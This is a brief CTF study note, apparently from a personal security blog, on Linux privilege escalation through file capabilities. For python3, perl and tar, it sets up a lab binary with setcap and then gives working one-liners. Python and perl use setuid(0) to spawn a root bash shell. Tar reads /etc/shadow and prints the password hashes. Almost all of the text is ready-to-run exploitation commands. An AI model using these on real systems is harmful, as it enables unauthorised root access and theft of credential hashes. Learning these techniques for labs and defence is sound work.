---
title: Capabilities
date: 2022-11-27T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: CTFs
tags:
  - linux
  - security
  - penetration-testing
---

**Sudo with python:**

```zsh
which python3
cp /usr/bin/python3 /home/demo/
setcap cap_setuid+ep /home/demo/python3

# --->>
getcap -r / 2>/dev/null
pwd
ls -al python3
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id
```

**Sudo with perl:**

```zsh
which perl
cp /usr/bin/perl /home/demo/
setcap cap_setuid+ep /home/demo/perl

# --->>
getcap -r / 2>/dev/null
pwd
ls -al perl
./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
id
```

**Sudo with tar:**

```zsh
which tar
cp /bin/tar /home/demo/
setcap cap_dac_read_search+ep /home/demo/tar

# --->>
getcap -r / 2>/dev/null
pwd
ls -al tar
./tar cvf shadow.tar /etc/shadow
ls
./tar -xvf shadow.tar
tail -8 etc/shadow # hashes of the password
```

- https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
